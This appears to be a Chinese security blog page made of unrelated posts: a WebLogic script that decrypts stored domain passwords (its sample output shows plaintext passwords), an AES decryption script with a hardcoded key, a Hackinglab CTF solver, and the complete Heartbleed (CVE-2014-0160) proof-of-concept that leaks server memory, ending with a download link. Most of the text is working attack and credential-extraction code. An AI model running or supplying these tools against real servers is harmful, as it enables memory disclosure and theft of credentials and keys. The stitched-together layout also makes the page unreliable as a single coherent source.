WebLogic 密码恢复

Title : How to recover the Password in WebLogic Server

The below steps need to follow to cover the password in weblogic server.

Step 1:

Run setWlstEnv.sh for setting up the environment variables.

Ex:-

. /u01/Middleware/oracle_common/common/bin/setWlstEnv.sh

Step 2:

weblogic password recover command –

[oracle@localhost bin]$ /opt/installations/tools/jdk1.7.0_55/bin/java weblogic.WLST decryptpassword.py /opt/ntdomain/domains/NT {AES}68+XWFqzaQdP5DmEgmkJZWnRWtIvjBd7v+y6h49tCd0\=

Initializing WebLogic Scripting Tool (WLST) …

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands
========================================
Decrypted Password:p0o9i8u7
========================================

Step 3:

weblogic user recovery command –

[oracle@localhost bin]$ /opt/installations/tools/jdk1.7.0_55/bin/java weblogic.WLST decryptpassword.py /opt/ntdomain/domains/NT {AES}WsnwdqROocsh6D1YOclnc1ySRyzheBNtZD2AGLnjIFM\=

Initializing WebLogic Scripting Tool (WLST) …

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands
========================================
Decrypted Password:weblogic
========================================

 

 

decryptpassword.py:

import os
import weblogic.security.internal.SerializedSystemIni
import weblogic.security.internal.encryption.ClearOrEncryptedService
 
def decryptString(domainPath, encryptedString):
    es = weblogic.security.internal.SerializedSystemIni.getEncryptionService(domainPath)
    ces = weblogic.security.internal.encryption.ClearOrEncryptedService(es)
    decryptedString = ces.decrypt(encryptedString)
    print "=" * 70
    print " " * 10 +"Decrypted Password:" + decryptedString
    print "=" * 70
 
try:
    #os.system('clear')
    if len(sys.argv) == 3:
        decryptString(sys.argv[1], sys.argv[2])
    else:
        print "=" * 70
        print "INVALID ARGUMENTS"
        print "Usage: java weblogic.WLST %s " %sys.argv[0]
        print "example.:"
        print "    java weblogic.WLST %s /oracle/fmwhome/user_projects/domains/NT/ {AES}68+XWFqzaQdP5DmEgmkJZWnRWtIvjBd7v+y6h49tCd0\=" %sys.argv[0]
        print "=" * 70
except:
    print "Unexpected error: ", sys.exc_info()[0]
    dumpStack()
    raise

AES解密脚本(Python)

# coding=utf-8
from M2Crypto.EVP import Cipher
from M2Crypto import m2  
from M2Crypto import util  
import urllib
import sys
import base64
import binascii
import Crypto
import Crypto.Random
import array
from Crypto.Cipher import AES  
ENCRYPT_OP = 1 # 加密操作  
DECRYPT_OP = 0 # 解密操作  
#print Crypto.Random.OSRNG.posix.new().read(AES.block_size) 
iv = '\0' * 16 # 初始化变量,对于aes_128_ecb算法无用  
iv_arr=b'\x01\x01\x0b\x05\x04\x0f\x07\x09\x17\x03\x01\x06\x08\x0c\x0d\x5b'
iv=iv_arr
PRIVATE_KEY = 'mymiyao' # 密钥
  
def Encrypt(data):  
  '使用aes_128_ecb算法对数据加密'  
  cipher = Cipher(alg = 'aes_128_cbc', key = PRIVATE_KEY, iv = iv, op = ENCRYPT_OP)  
  buf = cipher.update(data)  
  buf = buf + cipher.final()  
  del cipher  
  # 将明文从字节流转为16进制  
  output = ''  
  for i in buf:  
    output += '%02X' % (ord(i))  
  return output  
  
def Decrypt(data):  
  '使用aes_128_ecb算法对数据解密'  
  # 将密文从16进制转为字节流  
  data = util.h2b(data)  
  cipher = Cipher(alg = 'aes_128_cbc', key = PRIVATE_KEY, iv = iv, op = DECRYPT_OP)  
  buf = cipher.update(data)  
  buf = buf + cipher.final()  
  del cipher  
  return buf
data = sys.argv[1]
data = urllib.unquote(data)
data = base64.decodestring(data)
data = data.encode('hex')
print Decrypt(data)

#encrypt_data= Encrypt(data)
#encrypt_data=data.decode('hex')
#encrypt_data=base64.encodestring(encrypt_data)
#print encrypt_data

Hackinglab脚本关 快速口算 Python解法

分值:350

小明要参加一个高技能比赛,要求每个人都要能够快速口算四则运算,2秒钟之内就能够得到结果,但是小明就是一个小学生没有经过特殊的培训,那小明能否通过快速口算测验呢?

http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php
#!/usr/bin/env python
__author__ = 'black_mia'
import urllib2
import urllib
import re
url='http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php'
req=urllib2.Request(url)
req.add_header("Cookie",'PHPSESSID=e6a4c74121e5df77165a2a0a00ca6e6c')
f=urllib2.urlopen(req)
matches=re.search("(.*)=<input",f.read())
data={'v':str(eval(matches.group(1)))}
data=urllib.urlencode(data)
req=urllib2.Request(url,data)
req.add_header("Cookie",'PHPSESSID=e6a4c74121e5df77165a2a0a00ca6e6c')
f=urllib2.urlopen(req)
matches=re.search("<body>(.*)<\/body>",f.read())
print matches.group(1)
f.close()

OpenSSL”心脏出血”漏洞检测利用代码-又是一个黑客的不眠之夜-切勿用于非法目的!

Openssl的这个漏洞还是比较严重的,经过检测,博主自己的几个站点的主机商提供的空间均存在该问题,而且博主也采用SSL方式访问这些站点,故需要立即撤下SSL私钥证书,以避免被窃取,暂时采用非SSL方式访问,等待主机商修复该问题。

POC代码如下:

#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')

hb = h2bin(''' 
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time() 
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()

链接: http://pan.baidu.com/s/1ntiC5Ix 密码: quu1